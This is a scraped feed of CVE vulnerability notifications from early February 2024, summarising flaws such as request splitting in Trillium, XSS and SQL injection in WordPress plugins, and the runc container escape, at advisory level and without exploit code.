🚨 CVE-2024-23644Trillium is a composable toolkit for building internet applications with async rust. In `trillium-http` prior to 0.3.12 and `trillium-client` prior to 0.5.4, insufficient validation of outbound header values may lead to request splitting or response splitting attacks in scenarios where attackers have sufficient control over headers. This only affects use cases where attackers have control of request headers, and can insert "\r\n" sequences. Specifically, if untrusted and unvalidated input is inserted into header names or values.Outbound `trillium_http::HeaderValue` and `trillium_http::HeaderName` can be constructed infallibly and were not checked for illegal bytes when sending requests from the client or responses from the server. Thus, if an attacker has sufficient control over header values (or names) in a request or response that they could inject `\r\n` sequences, they could get the client and server out of sync, and then pivot to gain control over other parts of requests or responses. (i.e. exfiltrating data from other requests, SSRF, etc.)In `trillium-http` versions 0.3.12 and later, if a header name is invalid in server response headers, the specific header and any associated values are omitted from network transmission. Additionally, if a header value is invalid in server response headers, the individual header value is omitted from network transmission. Other headers values with the same header name will still be sent. In `trillium-client` versions 0.5.4 and later, if any header name or header value is invalid in the client request headers, awaiting the client Conn returns an `Error::MalformedHeader` prior to any network access. As a workaround, Trillium services and client applications should sanitize or validate untrusted input that is included in header values and header names. Carriage return, newline, and null characters are not allowed.🎖@cveNotify |
|
| 2024-02-02 16:07:34 |
🚨 CVE-2024-23648Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password. The URL sent contains a unique token, valid during 24 hours, allowing the user to reset its password. This token is highly sensitive ; as an attacker able to retrieve it would be able to resets the user's password. Prior to version 1.2.3, the reset-password URL is crafted using the "Host" HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a "Host" header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue.🎖@cveNotify |
|
| 2024-02-02 16:07:33 |
🚨 CVE-2010-3328Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka "Uninitialized Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-02-02 16:07:29 |
🚨 CVE-2009-3553Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS 1.3.7 and 1.3.10 allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information.🎖@cveNotify |
|
| 2024-02-02 16:07:28 |
🚨 CVE-2009-1837Race condition in the NPObjWrapper_NewResolve function in modules/plugin/base/src/nsJSNPRuntime.cpp in xul.dll in Mozilla Firefox 3 before 3.0.11 might allow remote attackers to execute arbitrary code via a page transition during Java applet loading, related to a use-after-free vulnerability for memory associated with a destroyed Java object.🎖@cveNotify |
|
| 2024-02-02 16:07:27 |
🚨 CVE-2008-5038Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of "Get NCP Extension Information By Name" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852.🎖@cveNotify |
|
| 2024-02-02 15:07:25 |
🚨 CVE-2008-3281libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document.🎖@cveNotify |
|
| 2024-02-02 15:07:24 |
🚨 CVE-2005-2103Buffer overflow in the AIM and ICQ module in Gaim before 1.5.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an away message with a large number of AIM substitution strings, such as %t or %n.🎖@cveNotify |
|
| 2024-02-02 14:37:33 |
🚨 CVE-2023-217823D Builder Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-02 14:37:26 |
🚨 CVE-2023-217803D Builder Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-02 14:37:25 |
🚨 CVE-2003-1564libxml2, possibly before 2.5.0, does not properly detect recursion during entity expansion, which allows context-dependent attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, aka the "billion laughs attack."🎖@cveNotify |
|
| 2024-02-02 13:37:33 |
🚨 CVE-2024-1047The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register_reference() function in all versions up to, and including, 2.10.28. This makes it possible for unauthenticated attackers to update the connected API keys.🎖@cveNotify |
|
| 2024-02-02 13:37:26 |
🚨 CVE-2023-46045Graphviz 2.36 before 10.0.0 has an out-of-bounds read via a crafted config6a file. NOTE: exploitability may be uncommon because this file is typically owned by root.🎖@cveNotify |
|
| 2024-02-02 13:37:25 |
🚨 CVE-2024-1073The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-02 13:37:24 |
🚨 CVE-2024-0685The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.🎖@cveNotify |
|
| 2024-02-02 12:37:30 |
🚨 CVE-2024-1201Search path or unquoted item vulnerability in HDD Health affecting versions 4.2.0.112 and earlier. This vulnerability could allow a local attacker to store a malicious executable file within the unquoted search path, resulting in privilege escalation.🎖@cveNotify |
|
| 2024-02-02 12:37:29 |
🚨 CVE-2024-0963The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-02 12:37:26 |
🚨 CVE-2024-0844The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with "Form.php" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-02-02 12:37:25 |
🚨 CVE-2024-21626runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.🎖@cveNotify |
|
| 2024-02-02 12:37:24 |
🚨 CVE-2019-5736runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.🎖@cveNotify |
|
| 2024-02-02 10:37:30 |
🚨 CVE-2024-23895A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationcreate.php, in the locationid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-02-02 10:37:26 |
🚨 CVE-2023-51820An issue in Blurams Lumi Security Camera (A31C) v.2.3.38.12558 allows a physically proximate attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-02 10:37:25 |
🚨 CVE-2023-50488An issue in Blurams Lumi Security Camera (A31C) v23.0406.435.4120 allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-02 10:37:24 |
🚨 CVE-2023-39611An issue in Software FX Chart FX 7 version 7.0.4962.20829 allows attackers to enumerate and read files from the local filesystem by sending crafted web requests.🎖@cveNotify |
|
| 2024-02-02 08:37:25 |
🚨 CVE-2024-24524Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component.🎖@cveNotify |
|
| 2024-02-02 08:37:24 |
🚨 CVE-2020-24682Unquoted Search Path or Element vulnerability in B&R Industrial Automation Automation Studio, B&R Industrial Automation NET/PVI allows Target Programs with Elevated Privileges.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP; NET/PVI: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7, from 4.8.0 before 4.8.6, from 4.9.0 before 4.9.4.🎖@cveNotify |
|
| 2024-02-02 07:37:32 |
🚨 CVE-2024-0285in OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.🎖@cveNotify |
|
| 2024-02-02 07:37:26 |
🚨 CVE-2023-49118in OpenHarmony v3.2.4 and prior versions allow a local attacker causes information leak through out-of-bounds Read.🎖@cveNotify |
|
| 2024-02-02 07:37:25 |
🚨 CVE-2021-22282Improper copy algorithm in the project extraction component in B&R Automation Studio 4 may allow an unauthenticated attacker to execute codeThis issue affects Automation Studio: from 4.X through 4.0.🎖@cveNotify |
|
| 2024-02-02 07:37:24 |
🚨 CVE-2020-24681Incorrect Permission Assignment for Critical Resource vulnerability in B&R Industrial Automation Automation Studio allows Privilege Escalation.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP.🎖@cveNotify |
|
| 2024-02-02 06:37:25 |
🚨 CVE-2022-41613Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to an Out-of-Bounds Read when when parsing DGN files, which may allow an attacker to crash the product, disclose sensitive information, or execute arbitrary code.🎖@cveNotify |
|
| 2024-02-02 06:37:24 |
🚨 CVE-2022-40201Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to a Stack-Based Buffer Overflow when a malformed design (DGN) file is parsed. This may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-02-02 05:37:32 |
🚨 CVE-2024-21485Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server.**Note:**This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user.🎖@cveNotify |
|
| 2024-02-02 05:37:26 |
🚨 CVE-2024-1073The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-02 05:37:25 |
🚨 CVE-2024-0617The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue.🎖@cveNotify |
|
| 2024-02-02 05:37:24 |
🚨 CVE-2024-22204Whoogle Search is a self-hosted metasearch engine. Versions 0.8.3 and prior have a limited file write vulnerability when the configuration options in Whoogle are enabled. The `config` function in `app/routes.py` does not validate the user-controlled `name` variable on line 447 and `config_data` variable on line 437. The `name` variable is insecurely concatenated in `os.path.join`, leading to path manipulation. The POST data from the `config_data` variable is saved with `pickle.dump` which leads to a limited file write. However, the data that is saved is earlier transformed into a dictionary and the `url` key value pair is added before the file is saved on the system. All in all, the issue allows us to save and overwrite files on the system that the application has permissions to, with a dictionary containing arbitrary data and the `url` key value, which is a limited file write. Version 0.8.4 contains a patch for this issue.🎖@cveNotify |
|
| 2024-02-02 05:07:42 |
🚨 CVE-2024-23746Miro Desktop 0.8.18 on macOS allows Electron code injection.🎖@cveNotify |
|
| 2024-02-02 05:07:41 |
🚨 CVE-2024-22901Vinchin Backup & Recovery v7.2 was discovered to use default MYSQL credentials.🎖@cveNotify |
|
| 2024-02-02 05:07:37 |
🚨 CVE-2024-22900Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the setNetworkCardInfo function.🎖@cveNotify |
|
| 2024-02-02 05:07:36 |
🚨 CVE-2024-22779Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java.🎖@cveNotify |
|
| 2024-02-02 05:07:35 |
🚨 CVE-2023-50941IBM PowerSC 1.3, 2.0, and 2.1 does not provide logout functionality, which could allow an authenticated user to gain access to an unauthorized user using session fixation. IBM X-Force ID: 275131.🎖@cveNotify |
|
| 2024-02-02 05:07:31 |
🚨 CVE-2023-50938IBM PowerSC 1.3, 2.0, and 2.1 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 275128.🎖@cveNotify |
|
| 2024-02-02 05:07:30 |
🚨 CVE-2023-50328IBM PowerSC 1.3, 2.0, and 2.1 may allow a remote attacker to view session identifiers passed via URL query strings. IBM X-Force ID: 275110.🎖@cveNotify |
|
| 2024-02-02 05:07:29 |
🚨 CVE-2023-48793Zoho ManageEngine ADAudit Plus through 7250 allows SQL Injection in the aggregate report feature.🎖@cveNotify |
|
| 2024-02-02 05:07:26 |
🚨 CVE-2023-48792Zoho ManageEngine ADAudit Plus through 7250 is vulnerable to SQL Injection in the report export option.🎖@cveNotify |
|
| 2024-02-02 05:07:25 |
🚨 CVE-2023-49783Silverstripe Admin provides a basic management interface for the Silverstripe Framework. In versions on the 1.x branch prior to 1.13.19 and on the 2.x branch prior to 2.1.8, users who don't have edit or delete permissions for records exposed in a `ModelAdmin` can still edit or delete records using the CSV import form, provided they have create permissions. The likelihood of a user having create permissions but not having edit or delete permissions is low, but it is possible. Note that this doesn't affect any `ModelAdmin` which has had the import form disabled via the `showImportForm` public property. Versions 1.13.19 and 2.1.8 contain a patch for the issue. Those who have a custom implementation of `BulkLoader` should update their implementations to respect permissions when the return value of `getCheckPermissions()` is true. Those who use any `BulkLoader` in their own project logic, or maintain a module which uses it, should consider passing `true` to `setCheckPermissions()` if the data is provided by users.🎖@cveNotify |
|
| 2024-02-02 05:07:24 |
🚨 CVE-2023-48714Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue.🎖@cveNotify |
|
| 2024-02-02 03:37:39 |
🚨 CVE-2023-40092In verifyShortcutInfoPackage of ShortcutService.java, there is a possible way to see another user's image due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-02 03:37:32 |
🚨 CVE-2023-40090In BTM_BleVerifySignature of btm_ble.cc, there is a possible way to bypass signature validation due to side channel information disclosure. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-02 03:37:31 |
🚨 CVE-2023-40088In callback_thread_event of com_android_bluetooth_btservice_AdapterService.cpp, there is a possible memory corruption due to a use after free. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-02-02 03:37:30 |
🚨 CVE-2022-0545An integer overflow in the processing of loaded 2D images leads to a write-what-where vulnerability and an out-of-bounds read vulnerability, allowing an attacker to leak sensitive information or achieve code execution in the context of the Blender process when a specially crafted image file is loaded. This flaw affects Blender versions prior to 2.83.19, 2.93.8 and 3.1.🎖@cveNotify |
|
| 2024-02-02 03:37:26 |
🚨 CVE-2021-30860An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-02-02 03:37:25 |
🚨 CVE-2005-4650Joomla! 1.03 does not restrict the number of "Search" Mambots, which allows remote attackers to cause a denial of service (resource consumption) via a large number of Search Mambots.🎖@cveNotify |
|
| 2024-02-02 03:07:38 |
🚨 CVE-2003-0252Off-by-one error in the xlog function of mountd in the Linux NFS utils package (nfs-utils) before 1.0.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via certain RPC requests to mountd that do not contain newlines.🎖@cveNotify |
|
| 2024-02-02 03:07:32 |
🚨 CVE-2002-1347Multiple buffer overflows in Cyrus SASL library 2.1.9 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) long inputs during user name canonicalization, (2) characters that need to be escaped during LDAP authentication using saslauthd, or (3) an off-by-one error in the log writer, which does not allocate space for the null character that terminates a string.🎖@cveNotify |
|
| 2024-02-02 03:07:31 |
🚨 CVE-2002-0184Sudo before 1.6.6 contains an off-by-one error that can result in a heap-based buffer overflow that may allow local users to gain root privileges via special characters in the -p (prompt) argument, which are not properly expanded.🎖@cveNotify |
|
| 2024-02-02 03:07:30 |
🚨 CVE-2002-0083Off-by-one error in the channel code of OpenSSH 2.0 through 3.0.2 allows local users or remote malicious servers to gain privileges.🎖@cveNotify |
|
| 2024-02-02 03:07:26 |
🚨 CVE-2001-0334FTP service in IIS 5.0 and earlier allows remote attackers to cause a denial of service via a wildcard sequence that generates a long string when it is expanded.🎖@cveNotify |
|
| 2024-02-02 03:07:25 |
🚨 CVE-1999-1568Off-by-one error in NcFTPd FTP server before 2.4.1 allows a remote attacker to cause a denial of service (crash) via a long PORT command.🎖@cveNotify |
|
| 2024-02-02 02:37:38 |
🚨 CVE-2009-3781The filefield_file_download function in FileField 6.x-3.1, a module for Drupal, does not properly check node-access permissions for Drupal core private files, which allows remote attackers to access unauthorized files via unspecified vectors.🎖@cveNotify |
|
| 2024-02-02 02:37:32 |
🚨 CVE-2008-6548The rst parser (parser/text_rst.py) in MoinMoin 1.6.1 does not check the ACL of an included page, which allows attackers to read unauthorized include files via unknown vectors.🎖@cveNotify |
|
| 2024-02-02 02:37:31 |
🚨 CVE-2003-0411Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase ".JSP" extension instead of the lowercase .jsp extension.🎖@cveNotify |
|
| 2024-02-02 02:37:26 |
🚨 CVE-2001-0766Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.🎖@cveNotify |
|
| 2024-02-02 02:07:32 |
🚨 CVE-2015-3629Libcontainer 1.6.0, as used in Docker Engine, allows local users to escape containerization ("mount namespace breakout") and write to arbitrary file on the host system via a symlink attack in an image when respawning a container.🎖@cveNotify |
|
| 2024-02-02 02:07:26 |
🚨 CVE-2005-0587Firefox before 1.0.1 and Mozilla before 1.7.6 allows remote malicious web sites to overwrite arbitrary files by tricking the user into downloading a .LNK (link) file twice, which overwrites the file that was referenced in the first .LNK file.🎖@cveNotify |
|
| 2024-02-02 02:07:25 |
🚨 CVE-2001-1043ArGoSoft FTP Server 1.2.2.2 allows remote attackers to read arbitrary files and directories by uploading a .lnk (link) file that points to the target file.🎖@cveNotify |
|
| 2024-02-02 02:07:24 |
🚨 CVE-2000-0342Eudora 4.x allows remote attackers to bypass the user warning for executable attachments such as .exe, .com, and .bat by using a .lnk file that refers to the attachment, aka "Stealth Attachment."🎖@cveNotify |
|
| 2024-02-02 01:37:30 |
🚨 CVE-2024-21399Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-02 01:37:29 |
🚨 CVE-2023-50940IBM PowerSC 1.3, 2.0, and 2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 275130.🎖@cveNotify |
|
| 2024-02-02 01:37:26 |
🚨 CVE-2023-50937IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275117.🎖@cveNotify |
|
| 2024-02-02 01:37:25 |
🚨 CVE-2023-50327IBM PowerSC 1.3, 2.0, and 2.1 uses insecure HTTP methods which could allow a remote attacker to perform unauthorized file request modification. IBM X-Force ID: 275109.🎖@cveNotify |
|
| 2024-02-02 01:37:24 |
🚨 CVE-2023-50326IBM PowerSC 1.3, 2.0, and 2.1 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 275107.🎖@cveNotify |
|
| 2024-02-02 00:37:32 |
🚨 CVE-2024-22016In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an authorized user can write directly to the Scada directory. This may allow privilege escalation.🎖@cveNotify |
|
| 2024-02-02 00:37:26 |
🚨 CVE-2024-21869In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them.🎖@cveNotify |
|
| 2024-02-02 00:37:25 |
🚨 CVE-2024-21794In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can redirect users to malicious pages through the login page.🎖@cveNotify |
|
| 2024-02-02 00:37:24 |
🚨 CVE-2023-50939IBM PowerSC 1.3, 2.0, and 2.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 275129.🎖@cveNotify |
|
| 2024-02-01 23:37:32 |
🚨 CVE-2023-49617The MachineSense application programmable interface (API) is improperly protected and can be accessed without authentication. A remote attacker could retrieve and modify sensitive information without any authentication.🎖@cveNotify |
|
| 2024-02-01 23:37:26 |
🚨 CVE-2023-49610MachineSense FeverWarn Raspberry Pi-based devices lack input sanitization, which could allow an attacker on an adjacent network to send a message running commands or could overflow the stack.🎖@cveNotify |
|
| 2024-02-01 23:37:25 |
🚨 CVE-2023-46706Multiple MachineSense devices have credentials unable to be changed by the user or administrator.🎖@cveNotify |
|
| 2024-02-01 23:37:24 |
🚨 CVE-2023-36496Delegated Admin Privilege virtual attribute provider plugin, when enabled, allows an authenticated user to elevate their permissions in the Directory Server.🎖@cveNotify |
|
| 2024-02-01 23:07:32 |
🚨 CVE-2024-1040Gessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device.🎖@cveNotify |
|
| 2024-02-01 23:07:25 |
🚨 CVE-2023-47257ConnectWise ScreenConnect through 23.8.4 allows man-in-the-middle attackers to achieve remote code execution via crafted messages.🎖@cveNotify |
|
| 2024-02-01 23:07:24 |
🚨 CVE-2023-47256ConnectWise ScreenConnect through 23.8.4 allows local users to connect to arbitrary relay servers via implicit trust of proxy settings🎖@cveNotify |
|
| 2024-02-01 22:37:30 |
🚨 CVE-2024-1040Gessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device.🎖@cveNotify |
|
| 2024-02-01 22:37:26 |
🚨 CVE-2024-0325In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.🎖@cveNotify |
|
| 2024-02-01 22:37:25 |
🚨 CVE-2023-47257ConnectWise ScreenConnect through 23.8.4 allows man-in-the-middle attackers to achieve remote code execution via crafted messages.🎖@cveNotify |
|
| 2024-02-01 22:37:24 |
🚨 CVE-2023-47256ConnectWise ScreenConnect through 23.8.4 allows local users to connect to arbitrary relay servers via implicit trust of proxy settings🎖@cveNotify |
|
| 2024-02-01 21:07:32 |
🚨 CVE-2024-24041A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the location parameter at /travel-journal/write-journal.php.🎖@cveNotify |
|
| 2024-02-01 21:07:26 |
🚨 CVE-2024-24753Bref enable serverless PHP on AWS Lambda. When Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers. If PHP generates a response with two headers having the same key but different values only the latest one is kept. If an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security. For example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one. This vulnerability is patched in 2.1.13.🎖@cveNotify |
|
| 2024-02-01 21:07:25 |
🚨 CVE-2024-0943A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 21:07:24 |
🚨 CVE-2023-29081A vulnerability has been reported in Suite Setups built with versions prior to InstallShield 2023 R2. This vulnerability may allow locally authenticated users to cause a Denial of Service (DoS) condition when handling move operations on local, temporary folders.🎖@cveNotify |
|
| 2024-02-01 20:37:32 |
🚨 CVE-2024-0942A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-01 20:37:25 |
🚨 CVE-2024-23636SOFARPC is a Java RPC framework. SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But, prior to version 5.12.0, there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on JDK and does not rely on any third-party components. Version 5.12.0 fixed this issue by adding a blacklist. SOFARPC also provides a way to add additional blacklists. Users can add a class like `-Drpc_serialize_blacklist_override=org.apache.xpath.` to avoid this issue.🎖@cveNotify |
|
| 2024-02-01 20:37:24 |
🚨 CVE-2024-23341TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation.🎖@cveNotify |
|
| 2024-02-01 20:07:33 |
🚨 CVE-2024-23630An arbitrary firmware upload vulnerability exists in the Motorola MR2600. An attacker can exploit this vulnerability to achieve code execution on the device. Authentication is required, however can be bypassed.🎖@cveNotify |
|
| 2024-02-01 20:07:27 |
🚨 CVE-2024-23629An authentication bypass vulnerability exists in the web component of the Motorola MR2600. An attacker can exploit this vulnerability to access protected URLs and retrieve sensitive information.🎖@cveNotify |
|
| 2024-02-01 20:07:26 |
🚨 CVE-2023-6298A vulnerability classified as problematic was found in Apryse iText 8.0.2. This vulnerability affects the function main of the file PdfDocument.java. The manipulation leads to improper validation of array index. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier of this vulnerability is VDB-246124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. A statement published afterwards explains that the exception is not a vulnerability and the identified CWEs might not apply to the software.🎖@cveNotify |
|
| 2024-02-01 20:07:25 |
🚨 CVE-2018-17215An information-disclosure issue was discovered in Postman through 6.3.0. It validates a server's X.509 certificate and presents an error if the certificate is not valid. Unfortunately, the associated HTTPS request data is sent anyway. Only the response is not displayed. Thus, all contained information of the HTTPS request is disclosed to a man-in-the-middle attacker (for example, user credentials).🎖@cveNotify |
|
| 2024-02-01 19:37:25 |
🚨 CVE-2023-6176A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-01 19:07:25 |
🚨 CVE-2023-6176A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-01 19:07:24 |
🚨 CVE-2021-3714A flaw was found in the Linux kernels memory deduplication mechanism. Previous work has shown that memory deduplication can be attacked via a local exploitation mechanism. The same technique can be used if an attacker can upload page sized files and detect the change in access time from a networked service to determine if the page has been merged.🎖@cveNotify |
|
| 2024-02-01 18:37:33 |
